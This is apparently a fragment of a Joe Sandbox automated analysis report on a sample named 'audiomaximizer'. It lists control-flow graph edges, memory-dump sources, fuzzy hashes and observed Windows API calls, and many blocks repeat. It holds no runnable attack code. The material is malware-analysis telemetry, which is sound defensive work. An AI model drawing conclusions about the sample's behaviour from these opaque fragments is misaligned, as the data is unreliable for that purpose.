1687a3f-1687a43 105->108 113 1687a5b-1687a5d 107->113 114 1687a51-1687a55 107->114 108->76 108->107 110->72 110->78 117 1687a1c-1687a32 111->117 118 1687a0f-1687a14 111->118 119 1687aca-1687ad4 call 16863e0 112->119 120 1687b04-1687b08 112->120 121 1687a5f-1687a68 113->121 122 1687a92-1687a94 113->122 114->43 114->113 123 16879ee-16879f0 115->123 116->123 117->43 118->117 119->120 133 1687ad6-1687aeb 119->133 120->76 124 1687b0e-1687b12 120->124 127 1687a6a-1687a6f 121->127 128 1687a77-1687a8d 121->128 122->43 129 1687a9a-1687aa1 122->129 123->43 123->99 124->76 131 1687b18-1687b25 124->131 127->128 128->43 136 1687b34 131->136 137 1687b27-1687b32 131->137 133->120 142 1687aed-1687b02 133->142 139 1687b36-1687b38 136->139 137->139 139->43 139->76 142->2 142->120 145->86 146->86 147->86
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                                                • API String ID: 0-1932283790
                                                                                                                                                                                • Opcode ID: 72bd8179c379a39014542ea1b40d8797f99c3b36202eb09b25ec5bd069fa9b50
                                                                                                                                                                                • Instruction ID: b016ea5b77d936118675bb7ff3522c0b01ad3f8bbe2de7aa200fcdf493a1735d
                                                                                                                                                                                • Opcode Fuzzy Hash: 72bd8179c379a39014542ea1b40d8797f99c3b36202eb09b25ec5bd069fa9b50
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B125C30A002098FCB25EF68D984AAEBBF2FF49314F2586A9E5559B361D730ED45CB50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 782 16829ec-16829f6 784 16829f8-1682a01 782->784 785 1682981-168298a 782->785 786 1682990-1682999 784->786 787 1682a03-1682a3b 784->787 785->786 792 16829a0-16829c8 786->792 790 1682a5d-1682aac 787->790 791 1682a3d-1682a5c 787->791 797 1682aae-1682ab5 790->797 798 1682ac7-1682acf 790->798 799 1682abe-1682ac5 797->799 800 1682ab7-1682abc 797->800 802 1682ad2-1682ae6 798->802 799->802 800->802 804 1682ae8-1682aef 802->804 805 1682afc-1682b04 802->805 806 1682af1-1682af3 804->806 807 1682af5-1682afa 804->807 808 1682b06-1682b0a 805->808 806->808 807->808 810 1682b6a-1682b6d 808->810 811 1682b0c-1682b21 808->811 812 1682b6f-1682b84 810->812 813 1682bb5-1682bbb 810->813 811->810 819 1682b23-1682b26 811->819 812->813 823 1682b86-1682b8a 812->823 814 1682bc1-1682bc3 813->814 815 16836b6 813->815 814->815 817 1682bc9-1682bce 814->817 820 16836bb-16836f0 815->820 821 1683664-1683668 817->821 822 1682bd4 817->822 824 1682b28-1682b2a 819->824 825 1682b45-1682b63 call 16802c8 819->825 842 168371f-1683881 820->842 843 16836f2-168371a 820->843 828 168366a-168366d 821->828 829 168366f-16836b5 821->829 822->821 830 1682b8c-1682b90 823->830 831 1682b92-1682bb0 call 16802c8 823->831 824->825 826 1682b2c-1682b2f 824->826 825->810 826->810 833 1682b31-1682b43 826->833 828->820 828->829 830->813 830->831 831->813 833->810 833->825 843->842
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                                                                                                • API String ID: 0-2732225958
                                                                                                                                                                                • Opcode ID: f3b78a3e28608ebbdf886bf9b85d92330539221919fd09c8c8380500ddd7ad07
                                                                                                                                                                                • Instruction ID: 7b5ded95f2ec4543c473356a9b09d7734f80a4d25c583dbaf45274fdea262140
                                                                                                                                                                                • Opcode Fuzzy Hash: f3b78a3e28608ebbdf886bf9b85d92330539221919fd09c8c8380500ddd7ad07
                                                                                                                                                                                • Instruction Fuzzy Hash: 93A13471D003288FDF619F688C946AEBBB1FF84310F504AAED545A7355EB318D81CB92
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Hbq$Hbq
                                                                                                                                                                                • API String ID: 0-4258043069
                                                                                                                                                                                • Opcode ID: 102b2c29d7042245d2339d088417a8af0a3fbba12ee8c7d9493661bdceb20e86
                                                                                                                                                                                • Instruction ID: afce290092d40db9f1b8e27dbaffa5a76ab0fd046bb7f1a41c146244a4790abd
                                                                                                                                                                                • Opcode Fuzzy Hash: 102b2c29d7042245d2339d088417a8af0a3fbba12ee8c7d9493661bdceb20e86
                                                                                                                                                                                • Instruction Fuzzy Hash: C891BE303042458FDB16AF69CC94A6E7BF6BF89301F148669E9468B396CF35DC42CB91
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: ,bq$,bq
                                                                                                                                                                                • API String ID: 0-2699258169
                                                                                                                                                                                • Opcode ID: 33c3ae0550ed7d36c0876002b2085237f01141711cf9f40917a0a95d4c0ec6a2
                                                                                                                                                                                • Instruction ID: 18c851dddb7f3baa5b4849c34dd7ff47d033489fd3f0275ed8a51c21ea02d883
                                                                                                                                                                                • Opcode Fuzzy Hash: 33c3ae0550ed7d36c0876002b2085237f01141711cf9f40917a0a95d4c0ec6a2
                                                                                                                                                                                • Instruction Fuzzy Hash: AA81A130A00515CFCB14EF6DCC849AABBB2FF89314B158669D506EB365DB31EC81CB62
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 4'^q$4'^q
                                                                                                                                                                                • API String ID: 0-2697143702
                                                                                                                                                                                • Opcode ID: bfd1530ac4b9b15ee69e40d1995a57d086cfacb255fff9b88198ef741d1fd5dd
                                                                                                                                                                                • Instruction ID: aee516d69ea408216f9d77c14c7e1a04ea7cceabb73538747ddd62771a54685b
                                                                                                                                                                                • Opcode Fuzzy Hash: bfd1530ac4b9b15ee69e40d1995a57d086cfacb255fff9b88198ef741d1fd5dd
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B519C317002459FDB01AF68CC44B7ABBE6EB88318F048566E909CB356EB31DC42CB51
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Xbq$Xbq
                                                                                                                                                                                • API String ID: 0-1243427068
                                                                                                                                                                                • Opcode ID: 829eb081e12818019da2a12fdc0fc4cce0195962249b75b7bc4574291abcd6bc
                                                                                                                                                                                • Instruction ID: 56d8f9f558cbdafb114d79dafd846d9f8306370d3de72fea94034d87c68de69c
                                                                                                                                                                                • Opcode Fuzzy Hash: 829eb081e12818019da2a12fdc0fc4cce0195962249b75b7bc4574291abcd6bc
                                                                                                                                                                                • Instruction Fuzzy Hash: 5831E4337043258BDF286E6E8D9427EB9AABBC4B01F184639D906D3394DBB5CC468791
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $^q$$^q
                                                                                                                                                                                • API String ID: 0-355816377
                                                                                                                                                                                • Opcode ID: 42be1473ecfd7babaa37c4bb3084ce804bec8d99e48035cb59c98f976e335bf4
                                                                                                                                                                                • Instruction ID: 58ff668ff67d6eb3b2d3bee7e894c9aab844c6f0e18e9e96ae10fa7d0634db62
                                                                                                                                                                                • Opcode Fuzzy Hash: 42be1473ecfd7babaa37c4bb3084ce804bec8d99e48035cb59c98f976e335bf4
                                                                                                                                                                                • Instruction Fuzzy Hash: 9431C1303041518FDB3AAB3D9C9053E7BABBB84780B555A6AF242CB252DF29DC82C751
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR^q
                                                                                                                                                                                • API String ID: 0-2625958711
                                                                                                                                                                                • Opcode ID: f7acd382f7effff80278beb8c3d9ba672ea253a3c3549bb79c3bc4e4f4a7fcfa
                                                                                                                                                                                • Instruction ID: 8f3d626a95ef9c9ad0dc6f52a6406bf5f401820d9396bda78ba2824a6e3f0135
                                                                                                                                                                                • Opcode Fuzzy Hash: f7acd382f7effff80278beb8c3d9ba672ea253a3c3549bb79c3bc4e4f4a7fcfa
                                                                                                                                                                                • Instruction Fuzzy Hash: 8352A974900219CFCB64DF68ED98ADDBBB2FB48301F1095A9D409A7364DB386E85CF85
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR^q
                                                                                                                                                                                • API String ID: 0-2625958711
                                                                                                                                                                                • Opcode ID: 4af5dafc952f165784ad1fa3695da3ed651eed01833d3ee1789746f77a3323ca
                                                                                                                                                                                • Instruction ID: 04fc5a7bdee8845d611d4c7305a9e5012e8e846e4000ccc43011030e4d371f2a
                                                                                                                                                                                • Opcode Fuzzy Hash: 4af5dafc952f165784ad1fa3695da3ed651eed01833d3ee1789746f77a3323ca
                                                                                                                                                                                • Instruction Fuzzy Hash: 7652A974900219CFCB64DF68ED98ADDBBB2FB48301F1095A9D409A7364DB386E85CF85
                                                                                                                                                                                APIs
                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(00000014,?,?,040B42A8,031BF1F0,?,00000000), ref: 073F0FE6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4179800089.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_73f0000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                • Opcode ID: b2b8740bb765438db2dc785068f2193bb5c7de0c51f370962513100c9c9879f7
                                                                                                                                                                                • Instruction ID: 193dcd917b5de18321bff243cfce261fb03e8de2a8adcf31d2e0edc4b56b3239
                                                                                                                                                                                • Opcode Fuzzy Hash: b2b8740bb765438db2dc785068f2193bb5c7de0c51f370962513100c9c9879f7
                                                                                                                                                                                • Instruction Fuzzy Hash: DF718F74A01209EFDB14DF69D894D9EBBB6BF48750F114098FA05AB361D731EC81CB50
                                                                                                                                                                                APIs
                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07460787
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4180867299.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7460000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                • Opcode ID: 6a6e43cc6d51dbc36e9663065cdebb7d749a551dfdb434de2988651015596106
                                                                                                                                                                                • Instruction ID: 10aa2daf40071fe3dc10072974e43ee83731b75b54d3bab557cfea3861063844
                                                                                                                                                                                • Opcode Fuzzy Hash: 6a6e43cc6d51dbc36e9663065cdebb7d749a551dfdb434de2988651015596106
                                                                                                                                                                                • Instruction Fuzzy Hash: 05315CB4A00265CFCB10DF69C448AEEBBB5BF48B15F1445AAD905AB361DB34E841CFD2
                                                                                                                                                                                APIs
                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,?,?,?,00000000), ref: 073F2926
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4179800089.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_73f0000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                • Opcode ID: 2148b01d6dfac555360dbbb7c0d5c1ce5bc7e0011e7a2190a5052b17a7b3e931
                                                                                                                                                                                • Instruction ID: df8f21638999c047fafade4b4b614d0905173d4d0e97e07d964b57425771f689
                                                                                                                                                                                • Opcode Fuzzy Hash: 2148b01d6dfac555360dbbb7c0d5c1ce5bc7e0011e7a2190a5052b17a7b3e931
                                                                                                                                                                                • Instruction Fuzzy Hash: 1121DEB5B001019FEB14DB69D811BEEB7A6FFC8354F048178E60DA7391CB34A921CB94
                                                                                                                                                                                APIs
                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07460787
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4180867299.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7460000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                • Opcode ID: 6fcafaee47d02ce0a60df77b4f1683c710182222193875f0fa68af851c5a945e
                                                                                                                                                                                • Instruction ID: 588c2fe6806bb14b9c1b11466d2a4219057fcb226f5f29c74db650f4b4e70584
                                                                                                                                                                                • Opcode Fuzzy Hash: 6fcafaee47d02ce0a60df77b4f1683c710182222193875f0fa68af851c5a945e
                                                                                                                                                                                • Instruction Fuzzy Hash: 292139B99002598FDB109F65C448AEEFBB4FB08711F1485AAE504A7751C734A984CFE2
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05D0735E,?,?,?,?,?), ref: 05D0741F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                • Opcode ID: 79ac25006890637e191e1bf4e958b396a7e7b504c25b129806ac12c8b5d05b9f
                                                                                                                                                                                • Instruction ID: e2edac7b07466e936c3a9485c7d004c8982bd738e9e37088efa557f346ba1f95
                                                                                                                                                                                • Opcode Fuzzy Hash: 79ac25006890637e191e1bf4e958b396a7e7b504c25b129806ac12c8b5d05b9f
                                                                                                                                                                                • Instruction Fuzzy Hash: 732116B59002199FDB10CFA9D984ADEFFF8FB48310F14802AE918A7350C378A944CFA4
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05D0735E,?,?,?,?,?), ref: 05D0741F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                • Opcode ID: fee85f9cbaa2acfb895bd30f96a6865410db3807b3550c929bdb9b1f7a2db85b
                                                                                                                                                                                • Instruction ID: 0ad00ac4a645bafb62587d724c61bf03ca2cf46f2d4af300ae5c8e6c8a8e9041
                                                                                                                                                                                • Opcode Fuzzy Hash: fee85f9cbaa2acfb895bd30f96a6865410db3807b3550c929bdb9b1f7a2db85b
                                                                                                                                                                                • Instruction Fuzzy Hash: 242103B59003189FDB10CFAAD984ADEBFF4EB48310F10801AE958A7350D374A950CFA4
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,05D09058,040B42A8,031BF1F0), ref: 05D090E9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnumThreadWindows
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2941952884-0
                                                                                                                                                                                • Opcode ID: 73f6f7d2940ef637686b238e508911b9c0139cec8565ea6abe25318ddd33a525
                                                                                                                                                                                • Instruction ID: 7e0d1c0ac63c213a7a98cfee945b45ae44c32abed99b6303efc14830ba6b874f
                                                                                                                                                                                • Opcode Fuzzy Hash: 73f6f7d2940ef637686b238e508911b9c0139cec8565ea6abe25318ddd33a525
                                                                                                                                                                                • Instruction Fuzzy Hash: 46213A719002098FDB10CF9AC844BEFFBF5EB48310F10842AE455A7391D774A945CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,05D09058,040B42A8,031BF1F0), ref: 05D090E9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnumThreadWindows
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2941952884-0
                                                                                                                                                                                • Opcode ID: 9711267319ec60d63885caaa30aea1ceee0638f4f3cb74f16ca7d4b4aca2cffd
                                                                                                                                                                                • Instruction ID: 256031dc46fce14021a0bb59dbb3e14679ec651e092ddb8754e22a1bd83723cb
                                                                                                                                                                                • Opcode Fuzzy Hash: 9711267319ec60d63885caaa30aea1ceee0638f4f3cb74f16ca7d4b4aca2cffd
                                                                                                                                                                                • Instruction Fuzzy Hash: 762149B1D0024A8FDB14CF9AC884BEEFBF5FB88310F14842AD459A7291D774A985CF65
                                                                                                                                                                                APIs
                                                                                                                                                                                • MessageBoxW.USER32(?,00000000,00000000,?), ref: 05D09485
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2030045667-0
                                                                                                                                                                                • Opcode ID: ae959c4a30519dcee2da36e49f9c08f9fdf072f7ee8266d743c47335d092f66e
                                                                                                                                                                                • Instruction ID: 3ee2b8b8ec1c3baf9e1a32e155b83f99e0dbc852efed857972498226351d3d61
                                                                                                                                                                                • Opcode Fuzzy Hash: ae959c4a30519dcee2da36e49f9c08f9fdf072f7ee8266d743c47335d092f66e
                                                                                                                                                                                • Instruction Fuzzy Hash: 6B210FBAC00309DFCB10CF9AD984BDEFBB5FB48310F10842AE859A7241D379A544CBA4
                                                                                                                                                                                APIs
                                                                                                                                                                                • MessageBoxW.USER32(?,00000000,00000000,?), ref: 05D09485
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2030045667-0
                                                                                                                                                                                • Opcode ID: 5c938c3b1ca6582694dba00a88c6c21fa858c78b49be4ddd9acc2b7c090a5fc5
                                                                                                                                                                                • Instruction ID: 3ece6df58b5d93c0ee724a2ac01921d950e258d05fb2f0f0bfda304d33e12ead
                                                                                                                                                                                • Opcode Fuzzy Hash: 5c938c3b1ca6582694dba00a88c6c21fa858c78b49be4ddd9acc2b7c090a5fc5
                                                                                                                                                                                • Instruction Fuzzy Hash: 7721E0B69013599FCB10CF9AD894BDEFBB5FB88310F10852EE819A7241C375A544CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 07463CE5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4180867299.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7460000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                • Opcode ID: 5b07b374c3c484da88f68bee78082513381905b4c86840bde72179aa25851668
                                                                                                                                                                                • Instruction ID: 51f4dafa1e0da975de81b0c023c68d7487a0acf84781756c23e745f9be321d03
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b07b374c3c484da88f68bee78082513381905b4c86840bde72179aa25851668
                                                                                                                                                                                • Instruction Fuzzy Hash: DC1136B6800349DFDB10CF9AC545BDEBBF8FB48320F10845AE958A3641D379A584CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 07463CE5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4180867299.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7460000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                • Opcode ID: 8674d0dba8b1d2ab29311eba27ef0adde6ab5b51623780d64e3ba2c8db1361d3
                                                                                                                                                                                • Instruction ID: d0fa6bfb3c3317fdf598990108fb49268d39b44a0f01421e172b189eb42253d3
                                                                                                                                                                                • Opcode Fuzzy Hash: 8674d0dba8b1d2ab29311eba27ef0adde6ab5b51623780d64e3ba2c8db1361d3
                                                                                                                                                                                • Instruction Fuzzy Hash: 471106B6800349DFDB10CF9AC945BDEFBF8EB48320F10845AE558A3251D379A584CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageW.USER32(?,?,?,?), ref: 05D0987D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                • Opcode ID: b7e84efeb720c7609cfe74ccfdb5a7f0ffea88ada23b7eb505c5e14fa637acea
                                                                                                                                                                                • Instruction ID: 8083881f48c517397b68a01390271a14f62e5215edf6c491260cb2fcc8d3e276
                                                                                                                                                                                • Opcode Fuzzy Hash: b7e84efeb720c7609cfe74ccfdb5a7f0ffea88ada23b7eb505c5e14fa637acea
                                                                                                                                                                                • Instruction Fuzzy Hash: 2B1122B9800249DFCB10CF99D985BDEBBF8FB48320F20845AE518A7750C379A584CFA1
                                                                                                                                                                                APIs
                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 05D0821D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                • Opcode ID: f93f1f69dfebf74776401f210b2f5cc9b6e817dfb78aff9363965e9619efd8dc
                                                                                                                                                                                • Instruction ID: 589153381091e24768c17dde9a366207781c53969f9080d18aea2db84c0668d9
                                                                                                                                                                                • Opcode Fuzzy Hash: f93f1f69dfebf74776401f210b2f5cc9b6e817dfb78aff9363965e9619efd8dc
                                                                                                                                                                                • Instruction Fuzzy Hash: 6D1112B59003598FCB20DFAAD549BCEBBF4EB48320F24845AE519A7350C379A544CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 05D0821D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                • Opcode ID: 76a9f626f392946217c98620cd685754bbc9ff4f24681825d7c0bf25bec884fb
                                                                                                                                                                                • Instruction ID: 16a4d545f1bd61cb027e1811dc83a242ae8ddb7c93f5d4b7b9fdba6b0119f40c
                                                                                                                                                                                • Opcode Fuzzy Hash: 76a9f626f392946217c98620cd685754bbc9ff4f24681825d7c0bf25bec884fb
                                                                                                                                                                                • Instruction Fuzzy Hash: A71103B59007488FCB20DF9AD588BDEBBF4EB48320F20845AD559A7350C375A944CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageW.USER32(?,?,?,?), ref: 05D0987D
                                                                                                                                                                                Memory Dump Source
